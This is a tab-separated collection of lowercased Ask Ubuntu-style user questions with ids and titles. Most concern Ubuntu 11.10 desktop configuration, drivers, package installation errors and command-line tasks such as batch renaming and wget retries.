72535	creating .desktop files to use on the `` open with other application '' tab	i am looking for the specs necessary to build a .desktop file to be used in ubuntu 11.10 . many terminal applications or even gui application do not show on open with other application tab anymore and i want to create a .desktop file that makes that application be listed on the list again . i know that you can create a .desktop file and place it in ~/.local/share/applications but i do not know what all those settings mean . is there a guide that allows me to customize my .desktop files to my needs ?
72538	use keyfile for encrypted swap	i installed ubuntu 11.10 using the alternate cd and set up an ecrypted root and swap partition . now , during boot , i have to enter a password for the root and a passwort for the swap partitition . i want to get rid of the password for the swap partition and replace it by a keyfile that 's stored on the root partition . how can this be done ? is there maybe some hidden option in ubuntu so i do n't have to configure this in some configuration files ? thanks for any help !
72542	how do i install this python script ?	i 've been trying to install a python script , which is an extension for docky from here : https : //bugs.launchpad.net/docky/+bug/528777 ( first commenter ) but when i try to install it with this jack @ nc6400b : ~/downloads $ python empathy_badge.py install i get this fault traceback ( most recent call last ) : file `` empathy_badge.py '' , line 24 , in < module > from docky.docky import dockyitem , dockysink importerror : no module named docky.docky does anyone know what it means , and how do i install it . is it because i 'm trying to install it from my downloads folder , and what does it mean `` no module named docky.docky '' ? edit : i 'm running ubuntu 11.10 under gnome shell , if it 's any help .
72549	how to determine which window manager is running	is there any way ( such as a command or environmental variable ) to determine what window manager is the one actively running in the current session ?
72553	how do i remove the workspace switcher icon from launcher ?	i have read the way to do it on 11.04 by opening terminal and typing gnome-panel in it then changing some stuff around . but in 11.10 the terminal says gnome not installed and tells me what to type in to install it . i am nervous about installing gnome in 11.10 just to remove the icon cause i am not sure if gnome will clash with other programs and crash anything . so lets start fresh : does anyone know how to remove the workspace switcher icon from unity 's side bar launcher in 11.10 ? i want to keep multiple desktops as i use the cube . i just want that pesky icon gone .
72555	i do n't see an option to upgrade from the update manager	why is the update manager of my ubuntu 11.04 say `` there are no updates to install '' ? and no message `` new ubuntu release '11.10 ' is available '' is displayed ? in software sources it is set to `` normal releases '' . what am i missing ?
72557	different window managers on different screens ?	is it possible to run different window managers on different screens ? example , i want to run a tiling window manager ( such as awesome ) on one screen , and then i would like to run a stacking window manager ( such as compiz ) on another screen .
72562	how can i get media keys working on my keyboard ?	just got a new keyboard , the microsoft comfort curve 2000 , and everything seems to work fine except for the 'back ' and 'forward ' multimedia keys . i am running ubuntu 11.10 and have tried going into system settings - > keyboard - > shortcuts , then i try and hold down the keys to set the action i want them to perform , but nothing changes . any thoughts on where else to look ? -- update -- i rebooted and the options to change the keyboard shortcuts seem to be working now . now i can tweak the whole thing and i managed to assign the media keys correctly . thanks to everybody for the suggetions
72564	how can i restore a deleted username using its old home folder ?	i recently upgraded my ubuntu 11.04 to 11.10 , but while playing around trying to restore the gnome classic ( i really do n't like the unity ) , i screwed something up . ubuntu did not came back after restarting ... i was stuck . so i burned an installation cd and reinstalled ubuntu ( upgrade from 11.10 to 11.10 ) so the data was saved . however , i used a different username on installation by mistake , and now i 've got two home folders : /home/new_user/ and /home/old_user/ . the old_user is not registered as a user ( it 's not listed in the lightdm login screen ) , and i really just need one user , with my old data and configuration . so : is there a quick way to fix it ? as in , get my old_user to be the only user with all my settings back ? thank you .
72567	stopping the unity global menu from hijacking the menubar from my app	i 'm developing an application for ubuntu that ( ab ) uses the gtk : :menubar class to create a custom widget . it works fine on gnome-shell , but on unity the widget gets hidden . i know i can disable the appmenu when i run the application using ubuntu_menuproxy=0 but i want to disable it permanently in my app from the c++ code . is there a way to set a property on the widget so that the appmenu indicator will ignore it ?
72585	make default driver recognize lower screen resolutions 11.10 ?	my laptop relies on intel 815 video chip . this is very problematic video card . none of my games under wine runs after the upgrade to 11.10 . so i installed synaptic and removed the package that provided drivers for the video card ( intel 8xx xorg ) . unfortunately , the only screen resolution available for me after doing this , is 1024x768 . i would love to have the ability to resize to 800x600 ( which is supported when the driver is installed . is there something i can try to do that . anyone willing to help ?
72587	while configuring compiz , gui crashed . only desktop with icons and upper menu bar visible	while browsing through ccsm i clicked advanced , i guess , and whole gui crashed , i 've seen only a wallpaper with some graphical noise on it . i rebooted and all i see is desktop with icons on it and menu at the upper bar `` file|edit|view.. '' etc . without tools to shutdown or logout and that would be all . no dash , none of keyboard shortcuts working , no way for me to open console to try to fix it . wanted to reset x via console ( ctrl+alt+f1 ) but all i see is graphical noise , nothing readable , commands i tried to put without seeing them did n't work either . please help . edit : logging into different gui helped ( ubuntu - > ubuntu 2d ) , although anyone could help how to reset ubuntu 's gui settings ?
72588	how to configure nautilus so when a cd/dvd/usb is inserted it does not open another window	how to configure nautilus so that when i insert a cd , dvd , usb , etc.. it is not opened in another window but in the already opened nautilus windows . for example like a new nautilus window tab .
72599	remove icon in unity panel	hi , before i use natty . and i install battery-status like from : http : //www.omgubuntu.co.uk/2011/02/battery-applet-status-ubuntu/ , however , battery-status icon appears also participate in oneiric ( see red circle image ) , how do i remove it ? also , howto i change font size ang theme color in oneiric ? in natty usually i use `` appearance '' . thanks
72600	how to configure gnome 3 through a configuration file ?	before , one could configure certain options in gnome 2.x through the ~/.gtkrc-2.0 file . with gnome 3 , one would assume that ~/.gtkrc-3.0 works but it does n't .
72602	is it possible to disable the automatic download of updates when the internet connection is through a 3g dongle ?	is it possible to disable the automatic download of updates when the internet connection is through a 3g dongle , while still downloading them in the background when the connection is via wifi or eth0 ? ( without manually changing the preferences twice a day ) . i have a not-so-cheap pay-per-mb subscription , and what 's even worse , the 3g coverage in my area is lousy , so i prefer to have the whole , however crippled , bandwidth to myself . i do n't know if there are any other processes which use an internet connection whenever present ( well , ntp , but i suppose that traffic is negligible ) . i 'm using 10.10 currently .
72605	graphics driver for intel 3150 ?	hello everyone can anyone give me a link to the ubuntu driver of graphics card designed for intel 3150 ? and is there software which provides a substitute ubuntu store windus content of the file download idm if so what the name of the software ?
72607	what is a good wireless usb lan adapter for xubuntu 10.04 and works with usb 1.0 ?	hello everyone i wanted to know if you guys know of a good wirelles usb internet adapter . i want to access the internet , but i ca n't because the desktop is to faraway from my router . to make things short i want to help my parents get internet in their old gateway desktop . is there any usb wireless internet adapter that works out of the box for xubuntu 10.04 ? i do n't have internet and do n't want to drag the desktop to my room to install the drivers for usb adapter i just want it plug and play . if it supports wpa even better .
72615	how do i make a terminal quicklist to open a terminal window with a new profile ?	i 've seen this answer and this one . i think i 've done what they say to do , but i 'm still having trouble . i 've copied /usr/share/applications/gnome-terminal.desktop to ~/.local/share/applications/ . i then edited that file to look like this [ desktop entry ] name=terminal comment=use the command line tryexec=gnome-terminal exec=gnome-terminal icon=utilities-terminal type=application x-gnome-docpath=gnome-terminal/index.html x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=gnome-terminal x-gnome-bugzilla-component=bugbuddybugs x-gnome-bugzilla-version=3.0.1 categories=gnome ; gtk ; utility ; terminalemulator ; startupnotify=true onlyshowin=gnome ; unity ; x-ayatana-desktop-shortcuts=new ; newdev x-ubuntu-gettext-domain=gnome-terminal [ new shortcut group ] name=new terminal exec=gnome-terminal targetenvironment=unity [ newdev shortcut group ] name=new development terminal exec=gnome-terminal -- window-with-profile=development targetenvironment=unity i then chowned the file to make me the owner instead of root . i closed all my terminals and removed the terminal icon from the launcher . now , if i open terminal from the dash , i get a new launcher icon which has the new quicklist . but if i press ctrl + alt + t , it opens a different terminal icon , which does n't have the quicklist . what 's worse is that if i keep the new icon in the launcher and then close all terminals , using the new quicklist opens a new terminal with the correct profile , but with a new icon without the quicklist . i made a video here of some of the weird behavior . i also tried editing the /usr/share/applications/ file directly , but that did n't work at all . i got no new quicklist , and clicking on the launcher icon would n't load a terminal at all . what am i doing wrong in creating quicklists ?
72619	eye of gnome with blank background in place of image , except in full screen mode	when trying to open image files with eye of gnome , it only displays a window with a blank background in place of the image that can be zoomed and rotated . it only displays the image in full screen mode , but the `` smoothing '' options do not show , making the image appear grainy . this bug occurs with .jpg and .png image files but .tif files open in window mode , although it is still grainy and unsmoothed .
72620	how do i remove the dots from the lightdm greeter ?	i can change the background image that lightdm displays , but regardless of the image i choose , it 's overlaid with a grid of dots . the dots look ok on the default background , but they look horrible on the background i want to use . how can i get rid of them ? there do n't appear to be any relevant options in any of the files in /etc/lightdm .
72621	how can i get my netbook upgrade to 11.10 to use the new system button ?	most , if not all , the user interface updated correctly when i went from natty to oneiric but the system button did not . how can i get rid of the ugly purple monitor icon to be replaced with the new icon used by oneiric ? is it a unity-2d thing ?
72628	how to batch rename files with `` variables '' ?	i use xmbc to view my tv shows . before i began using xmbc , i batch downloaded the first few seasons of `` bleach '' . what can i say , i 'm an anime fan ; - ) . these are named : `` bleachxx.mp4 '' where xx is the episode number in respect to the whole series , not to the season . so `` bleach21.mp4 '' is the 1st episode of the second season and 21st overall . the files themselves are , however , divided into their own season folders . i know you can use the `` rename '' command to batch rename files . after much tinkering with it using this guide : http : //tips.webdesign10.com/how-to-bulk-rename-files-in-linux-in-the-terminal i got this command : rename -n 's/.* ( \d { 2 } ) . * $ /bleach s0xe $ 1/ ' * the problem is that the command will rename all the files into `` bleach s0xexx '' but because the files have the overall file numbers , bleach52.mp4 -- > 'bleach s03e52.mp4 ' when there obviously are n't 52 episodes in season 3 . i would like to know , then , if there is any way to apply mathematical operations to the file renaming . this would solve the problem as i could subtract the number of episodes in the previous seasons by the overall number and essentially get the season number . example : if there are 20 episodes in season 1 , then 25-20=5 so the 25th episode is the 5th of season 2 and renaming would carry out as normal . so , is there anyway to change the values of renaming by applying math operations ? p.s . i 'm sorry for the long explanation but i was n't sure how to or if my question would be clear without it .
72629	link to download the appropriate driver nvidia-ion 2	i have a asus laptop model n2015 and has also built video card - nvidia-ion 2 shipping can anyone direct me to a link to download the appropriate driver nvidia-ion 2 ubuntu 11.10
72631	i upgraded to 11.10 but my home partition is missing , how can i recover it ?	when i installed ubuntu 11.04 , i created a separate home partition . i have just installed ubuntu 11.10 . in the installation screen the options were : erase ubuntu 11.04 and reinstall upgrade ubuntu 11.04 to 11.10 erase everything and reinstall something else i chose the option called `` erase ubuntu 11.04 and reinstall '' . now that installation has finished , i have logged in but everything is fresh , my home partition was ignored or not recognized . so opps ... i must have choosen the wrong installation type from the menu - doh ! luckily , there is a glimmer of hope because i can see the old home partition in nautilus complete with my old home data and i can see the partition in sudo fdisk -l. how can i recover my old home partition so that the new 11.10 uses it and everything is back to normal ? should i re-install but choose a different option ? or is there some command line fu i can use to get me back up and running ?
72632	accessing xubuntu gui remotely on linode	i 'm ssh 'd as root into my linode server and have installed xubuntu ( for ubuntu 10.04 ) . now i 'd like to use it , but issuing starts brings about the fatal error no screens found . i 've installed and run emacs which appears as a gui interface with the terminal ( i 'm using os x ) window , so how can i do the same with xubuntu so i can see a desktop ? thanks !
72634	how to get chrome to rollup/rolldown when double clicking the titlebar ?	i 'm using ubuntu , not ubuntu 2d , on kubuntu 11.10 . every application except chrome abides by the toggle_shade setting i have when double-clicking the titlebar . how do i get chrome to behave like the other applications ?
72637	how to install alien arena 7.52	i downloaded the tar.gz file from the site , but it seems kind of confusing . is there any easier way to install the newest version ?
72646	gnome 3 notifications are replaced with notify-osd when the machine goes to sleep	a similar question exists for 11.04 , but the answers were `` wait for 11.10 ; it 'll work there . '' 11.10 has arrived , and it dun broke on me . : - ( when i first started using gnome shell , the gnome 3 notifications worked fine . after suspending and resuming , it appears to have reverted to the unity notify-osd bubbles . this is annoying , because a bunch of notify-osd bubbles become little windows in the middle of the screen when the computer suspends . they also become queued up in the gnome shell notification bar at the bottom of the screen , all with the label `` notify-osd '' . if i log out and back in , notify-osd is gone and the gnome 3 indicators are back until i put the machine to sleep . but how can i keep them permanently ?
72647	change name of mobile android device	i have 2x htc evo android devices . both devices show up as pictures-pc36100 . i have to open the folder and then open a picture inside to figure out which phone the folder belongs to . is there anyway to rename the folders to differentiate between phones ? it appears the ubuntuone android app pulls the phone 's model number . perhaps the option provide a custom device name when setting up the ubuntuone android app on a specific device would be helpful .
72650	webcam/flash not detecting in facebook	i wan na use my webcam to click photos but it wont detect nor show the pop up to give it access in flash here is a video http : //dl.dropbox.com/u/1331696/facebook % 20flash % 20webvam.ogv its stuck there foreever : (
72651	is there any command or app to monitor my system activity ?	i 'm looking for a command to use in the terminal or an application that allows me to see everything what is going on on my pc on real time like $ xev but not just for gui facts but for application status , or background processes .
72653	create a batch rename srcipt in python ?	firstly , this question was made as a follow up of my previous question : how to batch rename files with `` variables '' ? . i 'm just restating it considering sergey 's recommendations . i use xmbc to view my tv shows . before i began using xmbc , i batch downloaded the first few seasons of `` bleach '' . what can i say , i 'm an anime fan ; - ) . these are named : `` bleachxx.mp4 '' where xx is the episode number in respect to the whole series , not to the season . so `` bleach21.mp4 '' is the 1st episode of the second season and 21st overall . the files themselves are , however , divided into their own season folders . the problem is that the command will rename all the files into `` bleach s0xexx '' but because the files have the overall file numbers , bleach52.mp4 -- > 'bleach s03e52.mp4 ' when there obviously are n't 52 episodes in season 3 . to solve this problem , i would have to subtract the number of episodes in the previous seasons by the overall number and essentially get the specific season number . example : if there are 20 episodes in season 1 , then 25-20=5 so the 25th episode is the 5th of season 2 and renaming would carry out as normal . i 'm a complete newb in coding , i just suggested a python script as i was told this was an effective way of solving this problem . can somebody please help me in the step by step process of writing this script ? thanks !
72654	laptop battery not charging after update ?	it shows i have 30 minutes left . the update involved kernels . i just do n't know . i do n't know if i 'll have power or not in a half hour . is there any way to roll back changes . what to do ?
72656	how to remove the bubble notification of empathy from the notification area	there is a bubble notification that appears in the notification area apart from the mail icon message . i only want one notification icon telling me when a new message has arrived . right now as seen in the image : i have the mail icon ( which is white right now but turns blue when a new message arrives ) and the first green icon , which is the bubbling talk icon that i want to remove . when a message appears both of them tell me a new message has arrives . i only want the mail icon ( the white one between the keyboard and the bluetooth icon )
72658	how can i free up disk space by removing files that are n't needed ?	how can we free disk space by removing unwanted data on the system ? how do we detect that the files are not necessary for the programs to work ?
72663	how to make wget retry download if speed goes below certain threshold ?	i 'm trying to download a large 2gb file with wget , but after a few minutes it seems to keep stalling . i ^c it , and wget it again [ with -- continue option ] , and it starts downloading again . is there a way to automate retrying the download when it stops downloading ? thanks
72666	11.10 : no window manager , no applications , just tty	logged into my ubuntu account and found myself on a screen with just my desktop background and nothing else . pressing the volume buttons displays the indicator , and i can get to a tty session but i ca n't do anything else . restarting gdm does n't seem to help at all either i 'm running 11.10 , upgraded from a wubi install of 11.04. any thoughts ?
72668	how can i use lighting as calendar app with gnome 3 shell ?	how can i use lighting as default instead the already removed evolution calendar app with gnome 3 shell ? i am on 11.10/64bit .
72671	time missing from panel	how to get the time back in the systray ? i had it in the middle of the toolbar at the top of classic 11.04 but upgraded to ubuntu 11.10 and it is gone . i have set whitelist to `` all '' already .
72673	how do i whitelist only truecrypt 's notification icon ?	the truecrypt icon shows when the whitelist for unity is set as : $ gsettings get com.canonical.unity.panel systray-whitelist [ 'all ' ] but i do not wish to display all system tray icons . only truecrypt 's . however setting 'truecrypt ' in whitelist does not seem to work after logging out and logging in : $ gsettings get com.canonical.unity.panel systray-whitelist [ 'javaembeddedframe ' , 'wine ' , 'scp-dbus-service ' , 'update-notifier ' , 'truecrypt ' ] is the name 'truecrypt ' correct ?
72676	similar programs to tomboy , but with reminders	i love tomboy , it is a great program , but it is missing a little bit what i need . let 's say i want to clean my room ( yes , lame example , but ca n't create something better ) , so i write me a note `` clean a room '' and that note is shown every 15 minutes let 's say until i delete that note or mark it is finished . or let 's say i create a note that in two days there is my mother 's birthday and it reminds me every 6 hours and stop reminding me it in two days . well , i search for similar programs , do you know any ? thank you very much and sorry for my english .
72679	is there any sound enhancers/equalizer ?	what i am looking for is to have system wide implementation of sound enhancements like bass boosts , echoes , fidelity , stereo enhancement and so on . audio video players have their own equalizer but they enhance only the audio / video files they are playing . so to enhance sounds playing such as : youtube , spotify , system sound , etc . i need a enhancer software . back in windows , i used to use srs hd audio lab to do the same . p.s . i have a horrible speaker set .
72684	where are gnome-terminal profiles stored in the filesystem ?	i created a new profile that opened with the fortune program ( atp-get install fortune-mod for the download location ) and set it as the profile with which to open all new terminals with so that i would get a new fortune when i opened terminal . unfortunately i did n't know to set `` exit terminal when process exits '' to something else so that it would n't exit out almost immediately . currently it does exit as soon as fortune exits which is nearly immediately and i need to delete the profile but i cant through the terminal `` manage profiles '' option because it exits too quickly to even try and open the edit menu let alone delete the profile . i need to know what directory the profile is saved to so that i can delete is manually . i tried to do a system wide search but the results of that search was tons of files and folders and i do n't have time to open them all . i appreciate all help i can get . thanks in advance .
72687	how to remove `` desktop '' option from alt-tab menu ?	when i press alt-tab it display all opened programs and desktop icon . i never use this desktop option and it is very annoying when you switch between other . i am a developer and use alt-tab very often . is it possible to disable the desktop option ?
72690	gnome 3.2 shell theme not being applied to all applications	i have been trying gnome 3.2 on a fresh install of 11.10 and loving it for how it manages the windows and with the notification bar at the bottom and auto hiding . with sooo many things different , it is hard to get used to coming from gnome 2.x on my elementary os machines . but still loving how gorgeous everything is . i have been playing around with themes trying to get it looking a little better . i prefer dark themes cause they tend to be easier on the eyes . i followed the tutorials on omg ! ubuntu about how to install shell themes . how to install all the tools need to make gnome 3 themable . and used the top 5 shell themes they featured here . omg ! ubuntu 's top 5 gnome shell themes and for the system theme i followed the tutorial on how to install adwaita dark theme . this thing wo n't let me post more than 2 links , so if you need to see the tutorial or get the theme file , please search adwaita dark on omgubuntu dot co dot uk now to the issue , for some reason the adwaita dark gtk part of the theme is not being applied to things like , firefox 7.0.1 , thunderbird 7.0.1 , keepassx 0.4.3 , pidgin 2.10 , and the ubuntu one client gui interface that came stock with ubuntu 11.10 . i would say that it is only the applications i 've added after installing 11.10 , but gnome tweak has the right theme applied to it and ubuntu one came stock . could it be just that these apps having been updated to use the gtk version that adwaita uses ?
72691	what is meant by easter egg ?	i saw something named `` easter egg '' while searching . what is it exactly ? how to get them ?
72694	how to install 100 server 's less effort ?	i am trying to install 100 's of ubuntu servers , they needs servers ( apache/memcached ) to be configured and they needs some other packages ( only 5 or 6 ) to be installed . what is the best way for this ?
72696	syslinux ? booting off a live usb ?	i used unetbootin to install xubuntu to a live usb ( a 4 gb sandisk ) . by default , i 'm running windows 7 ( which is also what i ran unetbootin on ) . the computer i 'm trying to use to boot off the live usb is an hp pavilion g7 ( also runs windows 7 by default ) . i also configured the live usb to have 1250 mb of persistent storage . i 've rearranged the boot order to immediately start with the usb , and i 've also tried directly booting off the usb . no matter what i do , i get the message : syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 h. peter anvin et al however , nothing happens past that . what should i do ? *there are no messages past the one i posted , its all there is on the screen , plus my blinking underscore cursor on the line directly beneath the message
72714	how can i upgrade kernel to 3.1 ?	the ubuntu kernel ppa does n't have kernel 3.1 . is there any other guaranteed way to upgrade because i do n't want to reinstall ubuntu again .
72718	i am looking for help with my gma500 in a t91mt	i have been working ( on and off ) for about 2 weeks now and i 'm still stuck in 800x600 ... i followed this guide as well as i could but when i got to : sudo apt-get install xorg-emgd emgd-dkms it returns : e : unable to locate package xorg-emgd e : unable to locate package emgd-dkms i 'm fairly new to linux and i have tried to make the switch before . i feel like i 'm really making headway this time though and i '' m starting to like the way things work in linux . ( this is just so you understand my knowledge of linux better ) any help is really appreciated even if its just blind suggestions or other helpful hints , i know the gma500 is a bit of a ... well people do n't seem to like it that much ... if you need/ want any additional info just ask . : ) after trying the solution to a similar post : sudo add-apt-repository ppa : gma500/ppa sudo apt-get update sudo apt-get install poulsbo-config poulsbo-driver-2d poulsbo-driver-3d the update step gives me : w : failed to fetch http : //ppa.launchpad.net/gma500/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/gma500/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and the install step gives me : e : unable to locate package poulsbo-config e : unable to locate package poulsbo-driver-2d e : unable to locate package poulsbo-driver-3d i am beginning to think i am missing something simpler than i think in these instructions ... ( the `` duplicate '' post links to the same instructions i stated preciously do n't work )
72721	webcam creates repeated error messages `` can not set freg 16000 ''	when i connect my logitech quickcam 3000 the terminal starts with the following error message : can not set freq 16000 to ep 0x86 it continues until i disconnect the webcam . what can i do to solve this ? note - the webcam works correctly in every sense . this is the only weird thing that happens when i connect it .
72722	how to make unity launcher backlight use one colour ?	how to make unity launcher backlight use one colour ? i want my launcher backlight all coloured with blue..
72727	how to see how many fps can a video card render and benchmark video card	am looking for ways to benchmark how many fps can a video card render . for the moment i only know about glxgears which comes with the package mesa-utils : what other tools can i use to benchmark or see how many fps can a video card render . note - in the example about glxgears i know is as simple as a directx rendering . is not a benchmark but i am showing it to give an idea of what kind of tool am looking for . something similar to 3dmark . also i know as mentioned in other places that glxgears can no be used as a benchmark tool , specially since it varies greatly depending on how big the gear window is and if it has another window on top of it . so not very precise . apart from that what programs in ubuntu can i use to see fps and do benchmarks .
72732	thunderbird 7 with email notification indicator does n't seems to work	i just realized that in ubuntu 11.10 fresh install the message indicator menu does n't notify me if i have new mail , just in case of starting thunderbird . the email setup completed , when thunderbird is running and downloading new email , the indicator works well . but , when thunderbird is not running , i thought the indicator checks for new email in the background without i need to start thunderbird manually . checking for new emails is set for 1 minute period under settings menu ( thunderbird ) . is there something that i need to set for that checking period also applied for the indicator menu , or i 'm missing something during the program setup , or is this a known bug ? thanks in advance !
72733	route table explanation	i 'm a newbie . recently i used the command ip route ls to print my route table . here is the content : 111.211.3.192/26 dev wlan0 proto kernel scope link src 111.211.3.205 metric 2 i 'm curious about the meaning of proto kernel and scope link .
72742	updating chromium requires installation of untrusted packages	i ca n't update my ubuntu cause it says : requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg why is that ? i never changed anything and it always used to work fine .
72744	how to debug usb devices to write my own drivers , such as we can debug network packets tcpdump -i any -x ?	how to debug and trace usb device connected to my system . so that i can build my own driver , where manufacturer never wants to build it for linux platform . for example with network equipment i can crack and build something using a debug and packet tracing e.g : tcpdump -i any -x 10:04:07.597910 ip localhost.localdomain.afs3-bos > localhost.localdomain.55400 : flags [ . ] , ack 383 , win 529 , options [ nop , nop , ts val 5627394 ecr 5627394 ] , length 0 0x0000 : 4500 0034 5c59 4000 4006 e068 7f00 0001 0x0010 : 7f00 0001 1b5f d868 56e8 837f 577b 5164 0x0020 : 8010 0211 fe28 0000 0101 080a 0055 de02 0x0030 : 0055 de02 how can i do this for usb2.0 or usb3.0 or pci-x1 cards ?
72747	no buffer space available	yesterday i 've got first in my ubuntu experience error `` connect : no buffer space available '' when trying to ping some host , which i do not have a connect at the moment . the issue rises when i use wimax connection , it appears suddenly . the only way is to restart network-manager . before in 10.10 i did n't have this error .
72748	install ubuntu desktop or server in ubuntu 11.10 ?	i was planning to install the latest ubuntu 11.10 . i mostly plan to install the server edition . i am having a 4gb ram and a 500gb hdd on an intel core 2 duo processor which i want to make good use of . apart from hosting a site on the server , i 'm not sure about what are the other advantages of installing the server edition over the desktop . i plan to use the m/c for development purposes also . can you kindly provide me more info on the pros and cons of using the server/desktop edition ( specifically for ubuntu 11.10 ) so that i could better decide which would suit my requirements before proceeding with the installation . i did have a look at what 's the difference between the server version and the desktop version ? for more info , although useful , its not detailed and not specific to the ubuntu version i 'm referring to . thank you very much for your time .
72752	how to create shortcuts inside any application ?	for example when i 'm in firefox i would like to press alt+f and have sidebar opened ( its in menu view - > sidebar - > sidebar ) is there any application that can do this ? p.s . i have used firefox as example .
72757	window manager looks weird in vnc or rdp	i just installed ubuntu 11.10 and i can log in lightdm successfully . but if i log in ubuntu in remote client via vnc or xrdp , the desktop is very weird . please check the screen-shot below . i used apt-get to install tightvncserver and xrdp , all settings by default . anyone knows how to fix it ? thanks in advance !
72758	any package is not installing in my machine after downloading java . give solution for my problem	i tried to install java . immediately after download i just quite the terminal . happening that i 'm unable to install any thing . my machine giving the following information . what i 've to do ? sudo apt-get install sun-java6-jdk reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : sun-java6-jdk : depends : sun-java6-bin ( > = 6.26-1natty1 ) but it is not going to be installed sun-java6-jre : depends : sun-java6-bin ( > = 6.26-1natty1 ) but it is not going to be installed or ia32-sun-java6-bin ( > = 6.26-1natty1 ) but it is not going to be installed recommends : gsfonts-x11 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
72766	how do i find out the model of my graphics card ?	i would like to know the model of my graphics card . i think it may be an ati , but i want to be sure ! i have ubuntu 11.10 ( 32 bit ) and an asus a6 va laptop .
72768	can i change the launcher location ?	i want to know if is possible , because i was looking for the settings but i did not find any .
72770	mouse wo n't work at startup when running classic gnome-failsafe desktop and auto-login	i 've got a laptop with ubuntu 11.10 with classic gnome-failsafe desktop and auto-login set up . sometimes , when i start the laptop and after typing in the gnome-keyring password , the touchpad cursor wo n't work . but if then i do ctrl+alt+del to log-out , and login again , the touchpad will work fine . any ideas why this might be happening ?
72771	gnome shell with desktop icons without unity file manager	i have new ubuntu 11.10 and i installed gnome-shell instead unity . i want to add some icons to desktop , but when i enable file manager to handle the desktop in ubuntu tweak i get file manager panel under the gnome shell main panel . is there way to delete this file manager panel and still have icons on the desktop ?
72772	what is orchestra , and how do i use it ?	writing this answer , i realized i do not know anything about orchestra . there 's no link to any website or documentation on their launchpad page . can anyone familiar with it explain how it works and how to use it ? i read orchestra is going to be integrated into juju for easily setting up bare metal systems , so i 'm assuming orchestra works in a similar manner .
72783	crashing/freezing problems with an aspire one 722	after several annoying points with installing ubuntu 11.10 on my acer aspire one 722 i finally made this run . after installing i had freeze issues and solved them by putting network boot on first priority on the bios . yesterday all worked fine , no problems with wlan etc . but today all is crashing down . atm iam at the university and tried to log into the public wlan . with that came : i can not shut down , terminal is not working , very slow perfomance , some apps are starting like libre office , some not like system manager , buttons are not reacting , wlan symbol is spinning all the time . any suggestions i can do ?
72784	migrate from gnote to org-mode	i have lots of notes in gnote and i consider to use org-mode instead . how can i migrate my gnote notes to org-mode ?
72788	formatting text piped to lpr ; adding margins	i often find it useful to print text using echo 'stuff ' | lpr the lpr output does get hard to read whenever the text is more than small paragraphs ; so i would like to add left and right margins to the text . a simple right margin fix is echo 'stuff ' | fmt -w 55 | lpr this however does not add any margin to the left of the text . is there a simple way to achieve this ?
72790	start x and unity from the console	i 'm running ubuntu 11.10 and i 'm wondering if it is possible to start x and unity from the console without using lightdm or any other display managers . i use unity 2d and my ~/.xsession is as follows - exec ck-launch-session dbus-launch -- exit-with-session gnome-session -- session=ubuntu-2d unity starts without issue when running startx , the only problem is that when maximised the window menu remains along with the global menu . with any combination of the ck-launch-session and dbus-launch commands , as well as removing one or both of them ( and the dbus-launch arguments ) , i still experience the same issue . using the default unity configuration ( i.e . 3d ) , explicitly setting a shell or using the -- sh-syntax option do n't make any difference to the problem . i 've tried a variety of different suggestions and googled until my fingers fall off , it does n't seem to be something which many people are asking about but for my curiosity i 'd be interested to know where i 'm going wrong . i appreciate that the dependency tree and things which lightdm manages are vast but if anybody could shed any light on this it 'd be appreciated . similar sort of questions which do n't offer working answers are - how to start x and unity , without gdm ? policykit is not initialised in custom xsession launched via lightdm thanks in advance for the assistance , nathan
72793	can someone get me a link to download the the driver of nvidia-ion 2 ubuntu 11.10	can someone get me a link to download the the driver of nvidia-ion 2 ubuntu 11.10
72794	why can i not keep instances of firefox from two different machines separate anymore ?	sorry this is a little long . it 's one of those issues that 's a little tricky to describe . i have two computers connected on a lan . one is running mythbuntu 11.10 , and one is running ubuntu 11.10 with ( the awesome ) gnome classic . before i upgraded to 11.10 , i would often sit at ubuntu machine and use ssh to access programs , such as firefox , on the mythbuntu machine . i could do this even if i already had a local instance of firefox running . so , just to be clear , before i upgraded i could run two separate instances of firefox on one machine , each originating from a different machine . one local , and one over ssh from the other machine . one machine 's firefox has different bookmarks and settings than the other . now , after upgrading , if i have the local instance of firefox running , and i try to run another over ssh , i do n't get the instance from the other machine . i get a new window of the already running instance . if i want to run a program from the second machine , i have to first close any instances from the first machine that might be already running . this is true regardless of which machine 's copy i opened first . i do n't know why this changed , but i suppose it does n't matter . i 'm just interested in results . how can i make it so that i can simultaneously run the two different machines ' version of any one application at the same time ? for example , two different firefoxes originating from each machine ?
72802	logwatch-7.4.0 reports pop3 and imap sessions as `` unmatched '' ?	since upgrading from 11.04 to 11.10 ( and therefore dovecot 1.x to 2.x ) logwatch is reporting the end of every pop3 and imap session as `` unmatched . '' i 've been searching for a solution and found that logwatch-7.4.0 has at least one patch specifically for dovecot-2.x that is related to the pop3/imap log entries . is there a place where we mere users of ubuntu can check the schedule to see when a package might make it to the repositories and/or request/suggest particular packages ( such as the latest logwatch ) ? i could manually install the latest , but in the past i 've found that once i go `` manual '' on a package , it is very difficult to get back on track with the repositories later . fwiw , i did replace the script for the dovecot service with the newer version and the report cleans up quite nice . i 'm sure other dovecot/logwatch users would appreciate getting logwatch-7.4.0 as much as i would .
72803	easy installation/removal of a latex package	i used to use latex in windows and there was miktex package manager with which it was very easy to add a missing package . i wanted to install textcomp to ubuntu 11.10 and it requires me to download the zip from here and find the packages which are in /usr/share/texmf-texlive/tex/latex in my case , extract the zip contents to there , and update the packages . is there a package manager which does installation and removal in an easier way like the miktex package manager in windows ?
72806	how do i set up a matrox triplehead2go ?	does anybody know how to set up the matrox triplehead2go on ubuntu 10.10 or 11.10 ? i have 3x 22 '' monitors and a gts450 nvidia video card .
72812	how to disable -nolisten ?	i just installed ubuntu 11.10 . i want to run an x-app from another system . i updated ./xinit/xserverrc and removed the -nolisten option . i rebooted . i can see that x is started with the nolisten option . i do n't have /etc/gdm subdir .
72818	notification download for xchat with unity ?	i want to be notified when a download is active in xchat like firefox is a little `` 1 '' and a progression bar , is that possible with xchat ? i want that : but i want it for xchat !
